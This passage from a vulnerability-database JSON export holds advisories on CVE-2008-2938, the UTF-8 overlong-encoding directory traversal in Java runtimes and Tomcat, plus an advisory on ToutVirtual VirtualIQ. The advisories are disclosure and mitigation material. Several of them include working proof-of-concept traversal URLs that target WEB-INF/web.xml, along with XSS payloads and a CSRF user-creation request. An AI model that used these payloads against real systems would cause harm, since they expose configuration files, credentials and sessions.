"NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0450", "CVE-2008-2938"], "modified": "2015-04-19T00:00:00", "id": "CPAI-2007-244", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:28", "description": "Due to misconfiguration of mailing lists, it was just pointed out this is\r\nalready public. Apologies to those vendors who have not reacted to Sun's\r\nannouncements of December 2nd in a timely manner;\r\n\r\nMitre ID: CVE-2008-2938\r\n\r\nInitial title: Java Runtime UTF-8 Decoding Flaw\r\n\r\nActual title: Java Runtime UTF-8 Decoder Smuggling Vector\r\n\r\nDiscovered by: William A. Rowe, Jr. <wrowe@rowe-clan.net>\r\n Sr. Software Engineer, SpringSource, Inc.\r\n Security Team member, Apache Software Foundation\r\n\r\nBased on Tomcat Path Traversal Flaw reported by OuTian[1] and Simon Ryeo[2].\r\n\r\nThanks go to the members of the Apache Security Team for their energy and\r\nendless efforts to triage and research potential vulnerabilities, separating\r\nsignal from noise; notably Remy Maucherat, Mark Thomas, Tim Ellison, and\r\nJoe Orton for their various contributions to triaging this specific flaw.\r\n\r\n** Sun's Resolution **\r\n\r\nSun released Java 6u11, 1.5.0_17, and 1.4.2_19 addressing this flaw. [3]\r\n\r\n** IBM's Resolution **\r\n\r\nIBM suffered a more limited vector which is addressed in J2SE 5.0 SR9, and\r\none would assume will be addressed by J2SE 1.4.2 SR13 and Java SE 6 SR4\r\nbut no further information was provided by IBM.\r\n\r\n** Disclosure History **\r\n\r\nInitial disclosures to the Java Runtime author community;\r\n 17 Jul - Apache Harmony Project\r\n 18 Jul - OpenJDK Project\r\n 21 Jul - Sun Microsystems, Inc.\r\n 28 Jul - HP\r\n 31 Jul - Apple, Inc.\r\n\r\nApache projects across the board, Spring, IBM, BEA, RedHat etc were also\r\nnotified at various points along the way.\r\n\r\n** Background **\r\n\r\nOn July 15 OuTian reported a vulnerability in Apache Tomcat[2] whereby\r\noverwide byte sequences in utf-8 could bypass both Apache Tomcat access\r\ncontrol restrictions as well as path decoding logic.\r\n\r\nOn July 17 Simon Ryeo reported[3] a variation of the same vulnerability in\r\nApache httpd server when proxying content generated from Tomcat.\r\n\r\nRemy Maucherat wrote a patch to address this particular expression of the\r\nvector for Tomcat 6.0.x[4] which also mitigates against any similar but as\r\nyet undiscovered decoding vulnerabilities. This patch has also been ported\r\nto 5.5.x[5] and 4.1.x[6]. On July 31st the Apache Software Foundation\r\npublished a mitigation to this vulnerability as Apache Tomcat release\r\n6.0.18.[7] and added this vulnerability to the Apache Tomcat security\r\npages[8]. Releases for 5.5.x and 4.1.x will follow shortly. The Tomcat\r\nvulnerability had been announced by Ryeo [9] but the full implications\r\nremained undisclosed.\r\n\r\nDuring the course of research, the Glassfish implementation was determined\r\nnot to be vulnerable to the specific exploit identified and reported by\r\nOuTian/Ryeo. However, all implementations which accept overlong paths,\r\nincluding Glassfish, remain vulnerable insofar as any access control is\r\nimplemented at the proxy or gateway layer of an http service. Apache Tomcat\r\nrelease 6.0.18 is no longer vulnerable with respect to its URI path, as\r\n6.0.18 rejects all requests where the decoded value changes the path\r\nrepresentation, but is still exposed due to this vector in other\r\ncharacteristics.\r\n\r\nThat said, the underlying vector for this vulnerability identified by Rowe\r\nis actually within the UTF-8 charset implementation of the\r\njava.nio.charset.CharsetDecoder. The onMaformedInput CodingErrorAction is\r\nnot triggered by the presence of overlong utf-8 octet sequences in a number\r\nof vulnerable Java runtime implementations, including Sun's JRE, OpenJDK,\r\nHP's RTE, BEA's JRocket, IBM's SDK, Apple's SDK and Apache Harmony. Other\r\nimplementations were not tested.\r\n\r\nOn July 18th, Rowe and Maucherat confirmed this flaw in Apache Harmony,\r\nSun's JRE and OpenJDK, and began distributing this information to affected\r\nJava Runtime authors to allow all to prepare appropriate fixes.\r\n\r\nOn August 13th, this information was made available to various framework\r\nauthors such as Spring, BEA, IBM, etc and other affected developers as\r\nidentified by US-CERT to address their specific exposure and potential\r\nvulnerabilities. It is the desire of the author that this announcement\r\nin limited form coincide with Sun's Synchronized Security Release[1] of\r\nthe Java platform in October, with parallel releases by HP, Apple, OpenJDK,\r\nApache Harmony etc within that time frame.\r\n\r\n** Actual Vulnerability **\r\n\r\nIn RFC 3629 "UTF-8, a transformation format of ISO 10646" [10] and even as\r\nearly as the preceding RFC 2279 [11], F. Yergeau et. al. clearly identified\r\nunder section 6. "Security Considerations" the impact of overlong byte\r\nsequences (and declaring same as invalid sequences) in January 1998. Such\r\nSecurity Considerations were not discussed in the preceding RFC 2044 [12]\r\npublished October 1996.\r\n\r\nLimiting consideration for the moment to the original vulnerability report\r\nand the HTTP/1.1 URI syntax, it becomes immediately clear that; HTTP/1.1\r\ndoes not specify an encoding for the URI (RFC 2616 [13] and RFC 2396 [14])\r\nand treats it as a octet stream known to the client and origin server, and\r\notherwise transparent to intervening proxies. Specific characters in the\r\nHTTP URI are significant, all of them within the US-ASCII character set\r\n(which is a deliberate subset of UTF-8 and the first 128 code points of\r\nUnicode). Many implementers and applications use UTF-8 encoding for their\r\nURI patterns as permitted (but not required) by HTTP/1.1.\r\n\r\nHowever, high octets have no specific meaning within RFC 2616 or RFC 2396.\r\nTheir presence, mapping two or more high octet bytes into a US-ASCII code\r\npoint, must be ignored by proxies, as such bytes are entirely appropriate\r\nin other character sets and HTTP/1.1 does not attribute any UTF-8 properties\r\nto this string. Non-conforming implementations which treat the entire URI\r\nas UTF-8, and which suffer from decoding overlong octet sequences into the\r\nUS-ASCII range, will behave differently than their conforming cousins.\r\n\r\nThis mismatch of behavior results yet again in the same class of vectors\r\nthat were identified three years ago by Linhart, Klein, Heled and Orrin.\r\nThe essential premise of their HTTP Request Smuggling whitepaper [15] holds\r\nthat the subtle differences in request parsing yield surprisingly\r\ndisastrous results. The same is true where a CR-LF line termination,\r\ndelimiter, etc. can be tunneled through proxy layers which are conforming\r\nacross into a nonconforming endpoint.\r\n\r\nThe risks of this vector are not limited in any manner to the http\r\nrequest line, however. Any multi-tier service may be at risk provided\r\nthat 1) the end point accepts invalid UTF-8 sequences, 2) an intermediate\r\ntransport layer performs no UTF-8 decoding, and 3) the intermediate\r\ntransport layer performs decoding, routing, or access control functions\r\nbased on US-ASCII assumptions about such invalid strings. Such services\r\nmight be external interfaces, or firewalled interfaces such as SQL query\r\nstrings and similar.\r\n\r\nThe authors of this note point out that the vulnerability is not to be\r\nconfused with the issue of normative canonical forms for string comparison.\r\nAs there should exist no mapping of code points > 127, any code point in\r\nthe range 0..127 should be available for parsing without an awareness that\r\nthe resulting string will be utf-8, provided all utf-8 high-bit octets are\r\npassed unmodified in the same sequence. Full string comparisons for access\r\ncontrol containing code points > 127 require a normative form common to the\r\ninput and reference strings, and authors must take this into consideration\r\nwhen implementing any access control based on UTF-8 where non-normative\r\nforms can be passed through any intermediate access control, but are\r\naccepted and then transformed by the endpoint into another representation.\r\n\r\n** Mitigating Abuse **\r\n\r\nThere are a number of layers which a service author must be concerned with.\r\nAt the simplest, if the request is read in UTF-8 for http or similar request\r\nprotocols, yet the protocol does not define the request stream as UTF-8,\r\nor is handled as essentially ASCII for transport purposes, embedded CR-LF\r\nline delimiters may be abused for smuggling attacks.\r\n\r\nAny delimiters within the input must then be considered. For example,\r\nthe colon of a header line may be rendered invisible, permitting headers\r\nthat would otherwise be rejected, or the various comma and similar\r\ndelimiters between fields may be hidden rendering multiple tokens into\r\na single apparent value.\r\n\r\nFinally, the text itself may be encoded with apparently unknown values.\r\nIn the case of http, these must be passed on as connection level headers\r\nrather than transport layer (hop by hop) headers and ignored. So some\r\nfield such as Transport-Encoding: chunked or Content-Length:value can\r\nbe passed without a proxy or service provider recognizing them for what\r\nthey are (a disallowed combination). The impact upon the HTTP URI was\r\nalready clearly disclosed, however it is not difficult to identify other\r\nnefarious effects which this can have.\r\n\r\nIf the application cannot be migrated to a corrected Java VM, the author\r\nshould examine the conversions to utf-8 component by component, and\r\nbe very cautious to reject and terminate any connection where overlong\r\nutf-8 sequences are identified. It's necessary to probe for these\r\nexplicitly if the VM will not reject them. Invalid patterns begin with\r\nthe octets 0xC0, 0xC1, 0xE0 followed by a value < 0xA0, 0xF0 followed by\r\na value < 0x90. Since five and six byte values cannot be represented by\r\nUTF-16, the values 0xF5 and higher should be rejected out of hand.\r\n\r\nFinally, if these overlong sequences are not explicitly parsed for, across\r\nany sort of applications beyond http, note the following statement of fact\r\nfrom RFC 3629;\r\n\r\n o US-ASCII octet values do not appear otherwise in a UTF-8 encoded\r\n character stream. This provides compatibility with file systems\r\n or other software (e.g., the printf() function in C libraries)\r\n that parse based on US-ASCII values but are transparent to other\r\n values.\r\n\r\nand contrast this to the case of an errant implementation such as those\r\nfound in the affected JVM's; this assumption must be turned on it's head.\r\nMultiply the cases affected by this error both into and out of the\r\nfilesystem and other resources from a given java-based service. It becomes\r\ncritical that all evaluation occurs after that translation, and none before\r\nthe string becomes Unicode.\r\n\r\n** References **\r\n\r\n[1] OuTian, "Tomcat - Unicode decoding directory traversal vulnerability"\r\n http://outian.org/tomcat.pdf\r\n\r\n[2] Ryeo, S., "Directory Traversal Vulnerability"\r\n https://issues.apache.org/bugzilla/show_bug.cgi?id=45417\r\n\r\n[3] Sun Microsystems, Java SE 6 Update 11 Release Notes\r\n http://java.sun.com/javase/6/webnotes/6u11.html\r\n\r\n[4] Maucherat, R., "Additional normalization check"\r\n http://svn.apache.org/viewvc?rev=678137&view=rev\r\n\r\n[5] Thomas, M., "Additional normalization check"\r\n http://svn.apache.org/viewvc?rev=681029&view=rev\r\n\r\n[6] Thomas, M., "Additional normalization check"\r\n http://svn.apache.org/viewvc?rev=681065&view=rev\r\n\r\n[7] Maucherat, R., "[ANN] Apache Tomcat 6.0.18 released"\r\n http://mail-archives.apache.org/mod_mbox/www-announce/200807.mbox [...]\r\n /[EMAIL PROTECTED]\r\n\r\n[8] "Tomcat Security Pages" http://tomcat.apache.org/security.html\r\n\r\n[9] Ryeo, S., "Apache Tomcat Directory Traversal Vulnerability"\r\n http://www.securityfocus.com/archive/1/495318/30/0/threaded\r\n\r\n[10] Yergeau, F., "UTF-8, a transformation format of ISO 10646"\r\n http://www.ietf.org/rfc/rfc3629.txt\r\n\r\n[11] Yergeau, F., "UTF-8, a transformation format of ISO 10646"\r\n http://www.ietf.org/rfc/rfc2279.txt\r\n\r\n[12] Yergeau, F., "UTF-8, a transformation format of ISO 10646"\r\n http://www.ietf.org/rfc/rfc2044.txt\r\n\r\n[13] Fielding, R., et al., "HTTP/1.1"\r\n http://www.ietf.org/rfc/rfc2616.txt\r\n\r\n[14] Berners-Lee, T., R. Fielding, L. Masinter "URI Generic Syntax"\r\n http://www.ietf.org/rfc/rfc2396.txt\r\n\r\n[15] Linhart, C., A. Klein, R. Heled, S. Orrin "HTTP Request Smuggling"\r\n http://www.cgisecurity.com/lib/HTTP-Request-Smuggling.pdf\r\n", "edition": 1, "cvss3": {}, "published": "2009-01-11T00:00:00", "type": "securityvulns", "title": "Java Runtime UTF-8 Decoder Smuggling Vector", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2938"], "modified": "2009-01-11T00:00:00", "id": "SECURITYVULNS:DOC:21130", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21130", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:27", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nCVE-2008-2938: Apache Tomcat information disclosure vulnerability - Updated\r\n\r\nSeverity: Important (was moderate)\r\n\r\nVendor:\r\nThe Apache Software Foundation\r\n\r\nVersions Affected:\r\nTomcat 4.1.0 to 4.1.37\r\nTomcat 5.5.0 to 5.5.26\r\nTomcat 6.0.0 to 6.0.16\r\nThe unsupported Tomcat 3.x, 4.0.x and 5.0.x versions may be also affected\r\n\r\nDescription (new information):\r\nFurther investigation of CVE-2008-2938 has shown that the vulnerability\r\nalso exists only with URIEncoding="UTF-8" set on the connector. In these\r\nconfigurations arbitrary files in the docBase for an application,\r\nincluding files such as web.xml, may be disclosed.\r\nUsers should also be aware that this vulnerability will apply when\r\nprocessing requests with UTF-8 body encoding and\r\nuseBodyEncodingForURI="true"\r\n\r\nMitigation:\r\n6.0.x users should upgrade to 6.0.18\r\n5.5.x users should upgrade to 5.5.27\r\n4.1.x users should obtain the latest source from svn or apply this patch:\r\nhttp://svn.apache.org/viewvc?view=rev&revision=681065\r\n\r\nExample:\r\nhttp://www.target.com/contextpath/%c0%ae%c0%ae/WEB-INF/web.xml\r\n\r\nCredit:\r\nThis additional information was discovered by the Apache Tomcat security\r\nteam.\r\n\r\nReferences:\r\nhttp://tomcat.apache.org/security.html\r\n\r\nMark Thomas\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.8 (Darwin)\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\r\n\r\niEYEARECAAYFAkjHnCMACgkQb7IeiTPGAkMoLQCg2PxS09CpZGI9t+QcdifSfMh8\r\nCHcAoOSRAPOzAFH5hx1w8jxOBthrAKEJ\r\n=Fi0E\r\n-----END PGP SIGNATURE-----", "edition": 1, "cvss3": {}, "published": "2008-09-10T00:00:00", "type": "securityvulns", "title": "[SECURITY] CVE-2008-2938 - Apache Tomcat information disclosure vulnerability - Updated", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2938"], "modified": "2008-09-10T00:00:00", "id": "SECURITYVULNS:DOC:20499", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20499", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:29", "description": "Server Version Info: Oracle-Application-Server-10g/10.1.3.1.0 Oracle-HTTP-Server\r\nPoC: http://OC4J/web-app/foobar/%c0%ae%c0%ae/WEB-INF/web.xml\r\nRelated: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2938\r\nExplaination: The "%c0%ae%c0%ae" is interpreted as: ".." because on\r\nJava's side: "%c0%ae" is interpreted as: "\uC0AE" that get's casted to\r\nan ASCII-LOW char, that is: ".".\r\n\r\nYou can read dangerous configuration information including passwords,\r\nusers, paths, etc..\r\nDiscovered: 8/16/08\r\nVendor contacted: 8/16/08\r\nVendor response: 8/18/08\r\nVendor reproduced the issue: 9/10/08\r\nVendor last contact: 9/30/08\r\nPublic Disclosure: 1/19/09\r\n\r\nOracle security bug id: 7391479\r\n\r\nFor more information contact Oracle Security Team: secalert_us@oracle.com\r\n\r\nI really wanted to give a link to a patch, but I think it's better if\r\nthis is known by sysadmins so they can filter this using an IDS.\r\n\r\nGreetings!!\r\n\r\n-- Eduardo\r\nhttp://www.sirdarckcat.net/\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "edition": 1, "cvss3": {}, "published": "2009-01-20T00:00:00", "type": "securityvulns", "title": "[Full-disclosure] Oracle Containers For Java Directory Traversal (OC4J) Oracle Application Server 10g (10.1.3.1.0) Oracle HTTP Server", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2938"], "modified": "2009-01-20T00:00:00", "id": "SECURITYVULNS:DOC:21199", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21199", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:27", "description": "Title: Apache Tomcat Directory Traversal Vulnerability\r\nAuthor: Simon Ryeo(bar4mi (at) gmail.com, barami (at) ahnlab.com)\r\nSeverity: High\r\nImpact: Remote File Disclosure\r\nVulnerable Version: prior to 6.0.18\r\nSolution:\r\n - Best Choice: Upgrade to 6.0.18 (http://tomcat.apache.org)\r\n - Hot fix: Disable allowLinking or do not set URIencoding to utf8 in order to avoid this vulnerability.\r\n - Tomcat 5.5.x and 4.1.x Users: The fix will be included in the next releases. Please apply the hot fix until next\r\nrelease.\r\nReferences:\r\n - http://tomcat.apache.org/security.html\r\n - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2938\r\nHistory:\r\n - 07.17.2008: Initiate notify (To Apache Security Team)\r\n - 08.02.2008: Responsed this problem fixed and released new version\r\n - 08.05.2008: Notify disclosure (To Apache Tomcat Security Team)\r\n - 08.10.2008: Responsed with some suggestions.\r\n\r\nDescription\r\nAs Apache Security Team, this problem occurs because of JAVA side.\r\nIf your context.xml or server.xml allows 'allowLinking'and 'URIencoding' as\r\n'UTF-8', an attacker can obtain your important system files.(e.g. /etc/passwd)\r\n\r\nExploit\r\nIf your webroot directory has three depth(e.g /usr/local/wwwroot), An\r\nattacker can access arbitrary files as below. (Proof-of-concept)\r\n\r\nhttp://www.target.com/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/foo/bar", "edition": 1, "cvss3": {}, "published": "2008-08-12T00:00:00", "type": "securityvulns", "title": "Apache Tomcat <= 6.0.18 UTF8 Directory Traversal Vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2938"], "modified": "2008-08-12T00:00:00", "id": "SECURITYVULNS:DOC:20328", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20328", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:28", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nCVE-2008-2938: Apache Tomcat information disclosure vulnerability - Update 2\r\n\r\nSeverity: Important\r\n\r\nVendor:\r\nMultiple (was The Apache Software Foundation)\r\n\r\nVersions Affected:\r\nVarious\r\n\r\nDescription (new information):\r\nThis vulnerability was originally reported to the Apache Software Foundation as\r\na Tomcat vulnerability. Investigations quickly identified that the root cause\r\nwas an issue with the UTF-8 charset implementation within the JVM. The issue\r\nexisted in multiple JVMs including current versions from Sun, HP, IBM, Apple and\r\nApache.\r\n\r\nIt was decided to continue to report this as a Tomcat vulnerability until such\r\ntime as the JVM vendors had released fixed versions.\r\n\r\nUnfortunately, the release of fixed JVMs and associated vulnerability disclosure\r\nhas not been co-ordinated. There has been some confusion within the user\r\ncommunity as to the nature and root cause of CVE-2008-2938. Therefore, the\r\nApache Tomcat Security Team is issuing this update to clarify the situation.\r\n\r\nMitigation:\r\nContact your JVM vendor for further information.\r\nTomcat users may upgrade as follows to a Tomcat version that contains a workaround:\r\n6.0.x users should upgrade to 6.0.18\r\n5.5.x users should upgrade to 5.5.27\r\n4.1.x users should upgrade to 4.1.39\r\n\r\nCredit:\r\nThis additional information was discovered by the Apache security\r\nteam.\r\n\r\nReferences:\r\nhttp://tomcat.apache.org/security.html\r\n\r\nMark Thomas\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.8 (Darwin)\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\r\n\r\niEYEARECAAYFAklKflkACgkQb7IeiTPGAkPEqwCg5WiCeyaGrUbP/PTIhqF8TGZt\r\nDcsAoJIx+NnKCCAk2JxGftVZbxxPrWGl\r\n=JALs\r\n-----END PGP SIGNATURE-----", "edition": 1, "cvss3": {}, "published": "2008-12-19T00:00:00", "type": "securityvulns", "title": "[SECURITY] CVE-2008-2938 - Apache Tomcat information disclosure vulnerability - Update 2", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2938"], "modified": "2008-12-19T00:00:00", "id": "SECURITYVULNS:DOC:21057", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21057", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:32", "description": "Secure Network - Security Research Advisory\r\n\r\nVuln name: ToutVirtual VirtualIQ Pro Multiple Vulnerabilities\r\nSystems affected: ToutVirtual VirtualIQ Professional 3.2 build 7882\r\nSystems not affected: --\r\nSeverity: High\r\nLocal/Remote: Remote\r\nVendor URL: http://www.toutvirtual.com\r\nAuthor(s): Alberto Trivero (a.trivero@securenetwork.it) \r\nClaudio Criscione (c.criscione@securenetwork.it)\r\nVendor disclosure: 02/07/2009\r\nVendor acknowledged: 16/07/2009\r\nVendor patch release: notified us on 06/11/2009\r\nPublic disclosure: 07/11/2009\r\nAdvisory number: SN-2009-02\r\nAdvisory URL: http://www.securenetwork.it/advisories/sn-2009-02.txt\r\n\r\n\r\n*** SUMMARY ***\r\n\r\nToutVirtual's VirtualIQ Pro is specifically designed for IT administrators \r\nresponsible for managing virtual platforms. VirtualIQ Pro provides\r\n Visibility, Analytics and policy-based Optimization - all from one single\r\nconsole. VirtualIQ Pro is hypervisor-agnostic supporting both Type I and Type \r\nII hypervisors. VirtualIQ Pro can be used to visualize, analyze and \r\noptimize your choice of virtualization platform - Citrix, Microsoft,\r\nNovell, Oracle and/or VMware.\r\n\r\nMultiple vulnerabilities has been found which a allow an attacker to conduct \r\nvarious XSS and CSRF attack, and other attacks due to the use \r\nof an old an not hardened version of the web server.\r\n\r\n\r\n*** VULNERABILITY DETAILS ***\r\n\r\n(a) Cross-site scripting (XSS)\r\n\r\nDue to an improper sanitization of user's input, multiple XSS attacks \r\n(reflective and stored) are possible.\r\nReflective PoCs:\r\n\r\nhttp://server:9080/tvserver/server/user/setPermissions.jsp?userId=1"><script>alert(1)</script>&amp;resultResourceIds=111-222-1933email@address.tst\r\n\r\nhttp://server:9080/tvserver/server/user/addDepartment.jsp?addNewDept=0&amp;deptName=%22;alert(1);//&amp;deptId=1&amp;deptDesc=asd\r\n\r\nhttp://server:9080/tvserver/server/inventory/inventoryTabs.jsp?ID=1;alert(1);//\r\n\r\nhttp://server:9080/tvserver/reports/virtualIQAdminReports.do?command=getFilter&amp;reportName=%22%3E%3Cscript%3Ealert(1)%3C/script%3E\r\n\r\nStored XSS attacks can be triggered in the "Middle Name" parameter in the \r\n"Edit Profile" page with an HTTP request like the following:\r\n\r\nPOST /tvserver/user/user.do?command=save&userId=1 HTTP/1.1\r\nHost: server:9080\r\nCookies: JSESSIONID=[...]\r\n\r\nuserName=IQMANAGER&firstName=IQ&middleName=asd'; \r\nalert(document.cookie);//&lastName=MANAGER&email=user%40domain.it&password=********&retypePassword=********&redirect=null&passwordModifed=false&isReportUser=false&roleId=1&supervisorId=1&departmentId=1&locationId=1\r\n\r\n\r\n(b) Cross-site request forgery (CSRF)\r\n\r\nAn attacker can perform different types of CSRF attacks against a logged user. \r\nHe can, for example, shutdown, start or restart an arbitrary\r\nvirtual machine, schedule new activities and so on.\r\n\r\nThe following HTTP request, if forged by the attacker and executed by the \r\nvictim while logged on VirtualIQ, creates an arbitrary user:\r\n\r\nPOST /tvserver/user/user.do?command=save&userId= HTTP/1.1\r\nHost: server:9080\r\nCookie: JSESSIONID=[...]\r\n\r\nuserName=asd1&firstName=asd2&middleName=asd3&lastName=asd4&email=asd5%40asd.com&password=asd6&retypePassword=asd6&redirect=null&passwordModifed=false&isReportUser=false&roleId=1&supervisorId=1&departmentId=1&locationId=1\r\n\r\n\r\n(c) Web server vulnerabilities\r\n\r\nVirtualIQ runs on top of an old version of Apache Tomcat: 5.5.9, for which \r\nmultiple public vulnerabilities have been released. As a \r\nPoC, a directory traversal attack (CVE-2008-2938) \r\ncan be performed as:\r\n\r\nhttp://server:9080/tvserver/server/%C0%AE%C0%AE/WEB-INF/web.xml\r\n\r\nListing of an arbitrary directory (CVE-2006-3835) can also be obtained with \r\nthe following PoC:\r\n\r\nhttp://192.168.229.85:9080/tvserver/server/;index.jsp\r\n\r\n\r\n(d) Information Leakage\r\n\r\nTomcat status page should be disabled or restricted, being accessible at:\r\n\r\nhttp://status:9080/status\r\n\r\nUsername and password to access a VM through SSH are also available in clear \r\ntext in the configuration page. \r\nSince an XSS vulnerability can also be triggered in the same page, an attacker \r\nwould also be able to easily capture the full credentials to access \r\nthe VM with a specially crafted XSS payload.\r\n\r\n(e) Remote code execution\r\n\r\nJBoss JMX Management Console is exposed and can be used by remote attackers to \r\nexecute arbitrary commands on the system:\r\n\r\nhttp://server:9080/jmx-console/\r\n\r\nJBoss Web Console is exposed as well and can be used by remote attackers to \r\nexecute any command on the system:\r\n\r\nhttp://server:9080/web-console/\r\n\r\n\r\n*** EXPLOIT ***\r\n\r\nAttackers may exploit these issues through a common browser as explained \r\nabove.\r\n\r\n\r\n*** FIX INFORMATION ***\r\n\r\nUpgrade to the latest version, at the moment 3.5 build 10.14.2009\r\n\r\n*** WORKAROUNDS ***\r\n\r\n--\r\n\r\n\r\n*********************\r\n*** LEGAL NOTICES ***\r\n*********************\r\n\r\nSecure Network (www.securenetwork.it) is an information security company, \r\nwhich provides consulting and training services, and engages in security \r\nresearch and development. \r\n\r\nWe are committed to open, full disclosure of vulnerabilities, cooperating\r\nwhenever possible with software developers for properly handling disclosure.\r\n\r\nThis advisory is copyright 2009 Secure Network S.r.l. Permission is \r\nhereby granted for the redistribution of this alert, provided that it is\r\nnot altered except by reformatting it, and that due credit is given. It \r\nmay not be edited in any way without the express consent of Secure Network \r\nS.r.l. Permission is explicitly given for insertion in vulnerability \r\ndatabases and similars, provided that due credit is given to Secure Network.\r\n\r\nThe information in the advisory is believed to be accurate at the time of \r\npublishing based on currently available information. This information is\r\nprovided as-is, as a free service to the community by Secure Network \r\nresearch staff. There are no warranties with regard to this information. \r\nSecure Network does not accept any liability for any direct, indirect,\r\nor consequential loss or damage arising from use of, or reliance on,\r\nthis information.\r\n\r\nIf you have any comments or inquiries, or any issue with what is reported \r\nin this advisory, please inform us as soon as possible.\r\n\r\nE-mail: securenetwork@securenetwork.it\r\nGPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc\r\nPhone: +39 02 24 12 67 88\r\n\r\n-- \r\nClaudio Criscione\r\n\r\nSecure Network S.r.l.\r\nVia Venezia, 23 - 20099 Sesto San Giovanni (MI) - Italia\r\nTel: +39 02.24126788 Mob: +39 392 3389178\r\nemail: c.criscione@securenetwork.it\r\nweb: www.securenetwork.it", "edition": 1, "cvss3": {}, "published": "2009-11-09T00:00:00", "title": "ToutVirtual VirtualIQ Multiple Vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": 